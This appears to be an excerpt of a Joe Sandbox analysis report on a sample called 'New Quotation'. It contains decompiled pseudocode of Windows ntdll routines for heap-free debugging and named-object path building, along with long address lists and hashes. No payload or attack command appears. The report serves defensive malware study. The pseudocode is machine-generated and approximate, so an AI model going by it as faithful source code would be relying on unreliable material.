                                                                                                                                                                                          0x1d8354cc
                                                                                                                                                                                          0x1d8354d0
                                                                                                                                                                                          0x1d8354d0
                                                                                                                                                                                          0x1d8354bd
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1D83547F
                                                                                                                                                                                            • Part of subcall function 1D812B10: LdrInitializeThunk.NTDLL ref: 1D812B1A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugInitializePrintThunkTimes
                                                                                                                                                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 3681346633-3570731704
                                                                                                                                                                                          • Opcode ID: 74e01ce5e766411753f690d77bde33926685d81360cc4aa42bd0fb7f47967bd1
                                                                                                                                                                                          • Instruction ID: 56252c0b96eb51bc1135f733540314cc2398d7a315db10fc7a2188bf1f57a3bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e01ce5e766411753f690d77bde33926685d81360cc4aa42bd0fb7f47967bd1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C927D75A04269DFEB24CF18D841BE9B7B5BF44760F0582EAE94DA7250D730AE80CF52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D87F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E1D87F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x1d8ad2f8);
				E1D827BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E1D7C7662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E1D87FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E1D7DFED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E1D880835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E1D7C753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d8c47d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E1D7E3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E1D880D24( *((intOrPtr*)(_t165 - 0x30)));
								E1D880835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x1d8c47d4;
							if( *0x1d8c47d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E1D88D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E1D803AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x1d8c47d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d8c47d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D87823A(_t162,  *(_t165 - 0x20)));
								E1D7CB910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x1d8c47a1 = 1;
									 *0x1d8c4100 = 0;
									asm("int3");
									 *0x1d8c47a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E1D7CB910("About to free block at %p\n",  *0x1d8c47d0);
						goto L30;
					}
				} else {
					_t164 =  *0x1d8c3750; // 0x0
					 *0x1d8c91e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}























                                                                                                                                                                                          0x1d87f8f8
                                                                                                                                                                                          0x1d87f8fa
                                                                                                                                                                                          0x1d87f8ff
                                                                                                                                                                                          0x1d87f906
                                                                                                                                                                                          0x1d87f909
                                                                                                                                                                                          0x1d87f90b
                                                                                                                                                                                          0x1d87f910
                                                                                                                                                                                          0x1d87f912
                                                                                                                                                                                          0x1d87f915
                                                                                                                                                                                          0x1d87f91f
                                                                                                                                                                                          0x1d87f93e
                                                                                                                                                                                          0x1d87f941
                                                                                                                                                                                          0x1d87f94f
                                                                                                                                                                                          0x1d87f954
                                                                                                                                                                                          0x1d87f956
                                                                                                                                                                                          0x1d87fb8c
                                                                                                                                                                                          0x1d87fb8e
                                                                                                                                                                                          0x1d87fb91
                                                                                                                                                                                          0x1d87fb91
                                                                                                                                                                                          0x1d87fb94
                                                                                                                                                                                          0x1d87fb9b
                                                                                                                                                                                          0x1d87fba0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fba0
                                                                                                                                                                                          0x1d87f95f
                                                                                                                                                                                          0x1d87f962
                                                                                                                                                                                          0x1d87f96c
                                                                                                                                                                                          0x1d87f96f
                                                                                                                                                                                          0x1d87f972
                                                                                                                                                                                          0x1d87f97a
                                                                                                                                                                                          0x1d87f97f
                                                                                                                                                                                          0x1d87f986
                                                                                                                                                                                          0x1d87f986
                                                                                                                                                                                          0x1d87f98b
                                                                                                                                                                                          0x1d87f98b
                                                                                                                                                                                          0x1d87f992
                                                                                                                                                                                          0x1d87f99a
                                                                                                                                                                                          0x1d87f99d
                                                                                                                                                                                          0x1d87f9a1
                                                                                                                                                                                          0x1d87f9aa
                                                                                                                                                                                          0x1d87f9aa
                                                                                                                                                                                          0x1d87f9aa
                                                                                                                                                                                          0x1d87f9ac
                                                                                                                                                                                          0x1d87f9af
                                                                                                                                                                                          0x1d87f9b7
                                                                                                                                                                                          0x1d87f9b9
                                                                                                                                                                                          0x1d87f9be
                                                                                                                                                                                          0x1d87f9c0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f9c6
                                                                                                                                                                                          0x1d87f9c9
                                                                                                                                                                                          0x1d87f9cf
                                                                                                                                                                                          0x1d87f9d5
                                                                                                                                                                                          0x1d87fa1b
                                                                                                                                                                                          0x1d87fa1e
                                                                                                                                                                                          0x1d87fa21
                                                                                                                                                                                          0x1d87fa26
                                                                                                                                                                                          0x1d87fb2b
                                                                                                                                                                                          0x1d87fb37
                                                                                                                                                                                          0x1d87fb39
                                                                                                                                                                                          0x1d87fb41
                                                                                                                                                                                          0x1d87fb4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fb4b
                                                                                                                                                                                          0x1d87fa2c
                                                                                                                                                                                          0x1d87fa33
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fa39
                                                                                                                                                                                          0x1d87fa3c
                                                                                                                                                                                          0x1d87fa3f
                                                                                                                                                                                          0x1d87fa42
                                                                                                                                                                                          0x1d87fa47
                                                                                                                                                                                          0x1d87fa49
                                                                                                                                                                                          0x1d87fa4c
                                                                                                                                                                                          0x1d87fa51
                                                                                                                                                                                          0x1d87fa54
                                                                                                                                                                                          0x1d87fa56
                                                                                                                                                                                          0x1d87fa5b
                                                                                                                                                                                          0x1d87fa60
                                                                                                                                                                                          0x1d87fa60
                                                                                                                                                                                          0x1d87fa54
                                                                                                                                                                                          0x1d87fa63
                                                                                                                                                                                          0x1d87fa67
                                                                                                                                                                                          0x1d87fa79
                                                                                                                                                                                          0x1d87fa7c
                                                                                                                                                                                          0x1d87fa7f
                                                                                                                                                                                          0x1d87fa69
                                                                                                                                                                                          0x1d87fa6b
                                                                                                                                                                                          0x1d87fa70
                                                                                                                                                                                          0x1d87fa73
                                                                                                                                                                                          0x1d87fa73
                                                                                                                                                                                          0x1d87fa82
                                                                                                                                                                                          0x1d87fa84
                                                                                                                                                                                          0x1d87fa88
                                                                                                                                                                                          0x1d87fa8b
                                                                                                                                                                                          0x1d87fa8d
                                                                                                                                                                                          0x1d87fa90
                                                                                                                                                                                          0x1d87fa95
                                                                                                                                                                                          0x1d87fa9b
                                                                                                                                                                                          0x1d87fa9b
                                                                                                                                                                                          0x1d87fa9b
                                                                                                                                                                                          0x1d87fa9d
                                                                                                                                                                                          0x1d87faa0
                                                                                                                                                                                          0x1d87faa6
                                                                                                                                                                                          0x1d87faad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fab3
                                                                                                                                                                                          0x1d87faba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fabc
                                                                                                                                                                                          0x1d87fac2
                                                                                                                                                                                          0x1d87fac5
                                                                                                                                                                                          0x1d87fae4
                                                                                                                                                                                          0x1d87fae9
                                                                                                                                                                                          0x1d87fac7
                                                                                                                                                                                          0x1d87fadc
                                                                                                                                                                                          0x1d87fae1
                                                                                                                                                                                          0x1d87fafa
                                                                                                                                                                                          0x1d87fb03
                                                                                                                                                                                          0x1d87fb0b
                                                                                                                                                                                          0x1d87fb0b
                                                                                                                                                                                          0x1d87fb11
                                                                                                                                                                                          0x1d87fb15
                                                                                                                                                                                          0x1d87fb17
                                                                                                                                                                                          0x1d87fb1e
                                                                                                                                                                                          0x1d87fb24
                                                                                                                                                                                          0x1d87fb25
                                                                                                                                                                                          0x1d87fb25
                                                                                                                                                                                          0x1d87fb15
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87faa0
                                                                                                                                                                                          0x1d87f9d7
                                                                                                                                                                                          0x1d87f9da
                                                                                                                                                                                          0x1d87f9f9
                                                                                                                                                                                          0x1d87f9fe
                                                                                                                                                                                          0x1d87f9dc
                                                                                                                                                                                          0x1d87f9f1
                                                                                                                                                                                          0x1d87f9f6
                                                                                                                                                                                          0x1d87fa0f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fa15
                                                                                                                                                                                          0x1d87f921
                                                                                                                                                                                          0x1d87f926
                                                                                                                                                                                          0x1d87f92e
                                                                                                                                                                                          0x1d87f936
                                                                                                                                                                                          0x1d87fba2
                                                                                                                                                                                          0x1d87fba5
                                                                                                                                                                                          0x1d87fbb1
                                                                                                                                                                                          0x1d87fbb1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                                                                                          • Opcode ID: 9a204a27c0e98bf1062e611d128a2836a376353335bab54cced8f8b8046198ff
                                                                                                                                                                                          • Instruction ID: 2ea4f947d3c9d19651b0ff1478d78a22a57e4c44cd8c203776693d2e2d913697
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a204a27c0e98bf1062e611d128a2836a376353335bab54cced8f8b8046198ff
                                                                                                                                                                                          • Instruction Fuzzy Hash: C571EE36904689DFCB01CF69D4906FDFBF2FF89314F06805AE5459B262CB35A980DB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D868D0A Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E1D868D0A(intOrPtr __ecx, signed short __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				char _v536;
				char _v1052;
				char _v1328;
				char _v1332;
				void* _v1404;
				char _v1484;
				char _v1492;
				char _v1496;
				signed short _v1500;
				signed short _v1504;
				char* _v1508;
				short _v1510;
				char _v1512;
				signed int _v1516;
				char _v1520;
				signed short _v1524;
				signed short _v1528;
				signed int _v1532;
				signed int _v1536;
				void* _v1540;
				char _v1544;
				intOrPtr _v1548;
				signed int _v1552;
				void* _v1556;
				char _v1557;
				char _v1569;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t123;
				short _t124;
				signed int _t125;
				signed int _t149;
				signed int _t150;
				char* _t175;
				char* _t177;
				signed int _t205;
				void* _t206;
				signed short _t207;
				signed int _t208;
				intOrPtr _t212;
				signed int _t216;
				signed int* _t219;
				void* _t220;
				signed int _t222;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t230;
				signed int _t232;
				signed int _t234;

				_t215 = __edx;
				_t232 = (_t230 & 0xfffffff8) - 0x614;
				_v8 =  *0x1d8cb370 ^ _t232;
				_t219 = _a8;
				_t205 = 0;
				_v1548 = __ecx;
				_v1516 = _v1516 & 0;
				_t222 = __edx;
				E1D818F40( &_v1052, 0, 0x208);
				E1D818F40( &_v532, 0, 0x208);
				_t234 = _t232 + 0x18;
				_v1508 = "\\";
				_t123 = 2;
				_v1512 = _t123;
				_push("true");
				_pop(_t124);
				_v1510 = _t124;
				if(_t219 == 0) {
					L73:
					_t125 = 0xc000000d;
					L74:
					_pop(_t220);
					_pop(_t223);
					_pop(_t206);
					return E1D814B50(_t125, _t206, _v8 ^ _t234, _t215, _t220, _t223);
				}
				_t212 = _v1548;
				if(_t212 == 0) {
					goto L73;
				}
				_t216 = _a4;
				_v1552 = _t216;
				_v1552 = _v1552 & 1;
				_v1536 = _t216;
				_v1536 = _v1536 & 0x00000002;
				_v1532 = _t216;
				_v1532 = _v1532 & 0x00000008;
				_a4 = _t216 & 0x00000004;
				_t215 = 0;
				 *_t219 = 0;
				_t219[1] = 0;
				_v1528 = 0;
				_v1524 = 0;
				_v1504 = 0;
				_v1500 = 0;
				_v1556 = 0;
				_v1557 = 1;
				_v1540 = 0;
				if(_t222 == 0) {
					_push( &_v1544);
					_push("true");
					_push( &_v1556);
					_push(0x1d);
					_push(_t212);
					_t224 = E1D812BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					__eflags = _v1556;
					if(__eflags == 0) {
						goto L4;
					}
					_push( &_v1544);
					_push(0x48);
					_push( &_v1404);
					_push(0x1f);
					_push(_v1548);
					_t224 = E1D812BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t205 = _v1404;
					__eflags = _t205;
					if(__eflags != 0) {
						goto L4;
					} else {
						_t224 = 0xc0000001;
						goto L66;
					}
				} else {
					_t205 = _t222;
					_v1556 = 1;
					L4:
					_push( &_v1544);
					_push("true");
					_push( &_v1540);
					_push(0x2a);
					_push(_v1548);
					_t224 = E1D812BC0();
					if(_t224 < 0) {
						L66:
						E1D7E3B90( &_v1504);
						if(_t224 < 0) {
							E1D7E3B90(_t219);
						}
						if(_v1557 != 0) {
							E1D7E3B90( &_v1528);
						}
						_t134 = _v1516;
						if(_v1516 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t134);
						}
						_t125 = _t224;
						goto L74;
					}
					if(_v1540 == 0) {
						L8:
						_push( &_v1544);
						_push("true");
						_push( &_v1520);
						_push(0xc);
						_push(_v1548);
						_t224 = E1D812BC0();
						if(_t224 < 0) {
							goto L66;
						}
						if(_v1556 == 0) {
							L13:
							_t207 = 0x104;
							L14:
							_push( &_v1544);
							_push(0x118);
							_push( &_v1332);
							_push(0x2c);
							_push(_v1548);
							_t224 = E1D812BC0();
							if(_t224 < 0) {
								goto L66;
							}
							_t225 = _v1556;
							if(_v1540 != 0 || _t225 != 0 || _v1520 != E1D7E3C40()) {
								_t149 = 0;
								__eflags = 0;
							} else {
								_t149 = 1;
							}
							if(_v1552 != 0) {
								__eflags = _a4;
								if(_a4 != 0) {
									_push(L"AppContainerNamedObjects");
									goto L40;
								}
								_t175 = L"\\AppContainerNamedObjects";
								__eflags = _t225;
								if(_t225 == 0) {
									_t175 = 0x1d7a5dfc;
								}
								_push(_t175);
								_t150 = E1D86774F( &_v1052, _t207, L"Global\\Session\\%ld%s", _v1520);
								_t234 = _t234 + 0x14;
							} else {
								if(_t149 != 0) {
									_push(L"\\BaseNamedObjects");
									L40:
									_t215 = _t207;
									_t150 = E1D86771A( &_v1052, _t207);
									L41:
									_t224 = _t150;
									if(_t224 < 0) {
										goto L66;
									}
									_v1552 = _v1552 & 0x00000000;
									_t215 = 0x208;
									_t214 =  &_v1052;
									_t224 = E1D8676DA( &_v1052, 0x208,  &_v1552);
									if(_t224 < 0) {
										goto L66;
									}
									if(_v1540 == 0 || _v1536 != 0) {
										_t226 = _v1552;
									} else {
										_t226 = (_v1504 & 0x0000ffff) + 2 + _v1552;
									}
									if(_v1556 != 0) {
										_t226 = _t226 + (_v1528 & 0x0000ffff) + 2;
									}
									if(_v1328 != 0 && _v1532 == 0) {
										E1D815050(_t214,  &_v1492, _v1332);
										_t226 = _t226 + (_v1500 & 0x0000ffff) + 2;
									}
									_t227 = _t226 + 2;
									_t208 = E1D7E5D60(_t227);
									if(_t208 != 0) {
										E1D818F40(_t208, 0, _t227);
										 *_t219 =  *_t219 & 0x00000000;
										_t234 = _t234 + 0xc;
										_t219[0] = _t227;
										_t219[1] = _t208;
										_t224 = E1D7DFE40(_t214, _t219,  &_v1052);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										__eflags = _v1540;
										if(_v1540 == 0) {
											L59:
											__eflags = _v1556;
											if(_v1556 == 0) {
												L62:
												__eflags = _v1328;
												if(_v1328 != 0) {
													__eflags = _v1532;
													if(_v1532 == 0) {
														_t224 = E1D7F10D0(_t214, _t219,  &_v1512);
														__eflags = _t224;
														if(_t224 >= 0) {
															_t224 = E1D7F10D0(_t214, _t219,  &_v1492);
														}
													}
												}
												goto L66;
											}
											_t224 = E1D7F10D0(_t214, _t219,  &_v1512);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											_t224 = E1D7F10D0(_t214, _t219,  &_v1528);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											goto L62;
										}
										__eflags = _v1536;
										if(_v1536 != 0) {
											goto L59;
										}
										_t224 = E1D7F10D0(_t214, _t219,  &_v1512);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										_t224 = E1D7F10D0(_t214, _t219,  &_v1504);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										goto L59;
									} else {
										_t224 = 0xc000009a;
										goto L66;
									}
								}
								_t177 = L"AppContainerNamedObjects";
								if(_t225 == 0) {
									_t177 = L"BaseNamedObjects";
								}
								_push(_t177);
								_push(_v1520);
								_t150 = E1D86774F( &_v1052, _t207, L"%s\\%ld\\%s", L"\\Sessions");
								_t234 = _t234 + 0x18;
							}
							goto L41;
						}
						_t224 = E1D8664B0(_t212, _t205,  &_v1496);
						if(_t224 < 0) {
							goto L66;
						}
						_t245 = _v1496 - 2;
						if(_v1496 != 2) {
							_t224 = E1D866400(_t212, _t215, __eflags, _t205,  &_v1516);
							__eflags = _t224;
							if(__eflags < 0) {
								goto L66;
							}
							_t224 = E1D7F39C0(_t205, _t224, __eflags,  &_v1528, _v1516, 1);
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							_push( *((intOrPtr*)(_t205 + 0x34)));
							_push( *((intOrPtr*)(_t205 + 0x30)));
							_push( *((intOrPtr*)(_t205 + 0x2c)));
							_push( *((intOrPtr*)(_t205 + 0x28)));
							_t207 = 0x104;
							_t224 = E1D86774F( &_v532, 0x104, L"%s\\%u-%u-%u-%u", _v1524);
							_t234 = _t234 + 0x20;
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							E1D7E3B90( &_v1528);
							E1D815050(_t212,  &_v1532,  &_v536);
							_v1569 = 0;
							goto L14;
						}
						_t224 = E1D7F39C0(_t205, _t224, _t245,  &_v1528, _t205, 1);
						if(_t224 < 0) {
							goto L66;
						}
						goto L13;
					}
					_push( &_v1544);
					_push(0x4c);
					_push( &_v1484);
					_push(1);
					_push(_v1548);
					_t224 = E1D812BC0();
					_t240 = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t224 = E1D7F39C0(_t205, _t224, _t240,  &_v1504, _v1484, 1);
					if(_t224 < 0) {
						goto L66;
					}
					goto L8;
				}
			}


























































                                                                                                                                                                                          0x1d868d0a
                                                                                                                                                                                          0x1d868d12
                                                                                                                                                                                          0x1d868d1f
                                                                                                                                                                                          0x1d868d29
                                                                                                                                                                                          0x1d868d33
                                                                                                                                                                                          0x1d868d35
                                                                                                                                                                                          0x1d868d39
                                                                                                                                                                                          0x1d868d3d
                                                                                                                                                                                          0x1d868d46
                                                                                                                                                                                          0x1d868d5c
                                                                                                                                                                                          0x1d868d61
                                                                                                                                                                                          0x1d868d64
                                                                                                                                                                                          0x1d868d6e
                                                                                                                                                                                          0x1d868d6f
                                                                                                                                                                                          0x1d868d74
                                                                                                                                                                                          0x1d868d76
                                                                                                                                                                                          0x1d868d77
                                                                                                                                                                                          0x1d868d7e
                                                                                                                                                                                          0x1d869217
                                                                                                                                                                                          0x1d869217
                                                                                                                                                                                          0x1d86921c
                                                                                                                                                                                          0x1d869223
                                                                                                                                                                                          0x1d869224
                                                                                                                                                                                          0x1d869225
                                                                                                                                                                                          0x1d869230
                                                                                                                                                                                          0x1d869230
                                                                                                                                                                                          0x1d868d84
                                                                                                                                                                                          0x1d868d8a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868d90
                                                                                                                                                                                          0x1d868d95
                                                                                                                                                                                          0x1d868d9a
                                                                                                                                                                                          0x1d868d9e
                                                                                                                                                                                          0x1d868da2
                                                                                                                                                                                          0x1d868da7
                                                                                                                                                                                          0x1d868dae
                                                                                                                                                                                          0x1d868db3
                                                                                                                                                                                          0x1d868db6
                                                                                                                                                                                          0x1d868db8
                                                                                                                                                                                          0x1d868dba
                                                                                                                                                                                          0x1d868dbd
                                                                                                                                                                                          0x1d868dc1
                                                                                                                                                                                          0x1d868dc5
                                                                                                                                                                                          0x1d868dc9
                                                                                                                                                                                          0x1d868dcd
                                                                                                                                                                                          0x1d868dd1
                                                                                                                                                                                          0x1d868dd5
                                                                                                                                                                                          0x1d868ddb
                                                                                                                                                                                          0x1d868f07
                                                                                                                                                                                          0x1d868f08
                                                                                                                                                                                          0x1d868f0e
                                                                                                                                                                                          0x1d868f0f
                                                                                                                                                                                          0x1d868f11
                                                                                                                                                                                          0x1d868f17
                                                                                                                                                                                          0x1d868f19
                                                                                                                                                                                          0x1d868f1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f21
                                                                                                                                                                                          0x1d868f25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f2f
                                                                                                                                                                                          0x1d868f30
                                                                                                                                                                                          0x1d868f39
                                                                                                                                                                                          0x1d868f3a
                                                                                                                                                                                          0x1d868f3c
                                                                                                                                                                                          0x1d868f45
                                                                                                                                                                                          0x1d868f47
                                                                                                                                                                                          0x1d868f49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f4f
                                                                                                                                                                                          0x1d868f56
                                                                                                                                                                                          0x1d868f58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f5e
                                                                                                                                                                                          0x1d868f5e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868f5e
                                                                                                                                                                                          0x1d868de1
                                                                                                                                                                                          0x1d868de1
                                                                                                                                                                                          0x1d868de3
                                                                                                                                                                                          0x1d868de7
                                                                                                                                                                                          0x1d868deb
                                                                                                                                                                                          0x1d868dec
                                                                                                                                                                                          0x1d868df2
                                                                                                                                                                                          0x1d868df3
                                                                                                                                                                                          0x1d868df5
                                                                                                                                                                                          0x1d868dfe
                                                                                                                                                                                          0x1d868e02
                                                                                                                                                                                          0x1d8691d5
                                                                                                                                                                                          0x1d8691da
                                                                                                                                                                                          0x1d8691e1
                                                                                                                                                                                          0x1d8691e4
                                                                                                                                                                                          0x1d8691e4
                                                                                                                                                                                          0x1d8691ee
                                                                                                                                                                                          0x1d8691f5
                                                                                                                                                                                          0x1d8691f5
                                                                                                                                                                                          0x1d8691fa
                                                                                                                                                                                          0x1d869200
                                                                                                                                                                                          0x1d86920e
                                                                                                                                                                                          0x1d86920e
                                                                                                                                                                                          0x1d869213
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d869213
                                                                                                                                                                                          0x1d868e0d
                                                                                                                                                                                          0x1d868e4a
                                                                                                                                                                                          0x1d868e4e
                                                                                                                                                                                          0x1d868e4f
                                                                                                                                                                                          0x1d868e55
                                                                                                                                                                                          0x1d868e56
                                                                                                                                                                                          0x1d868e58
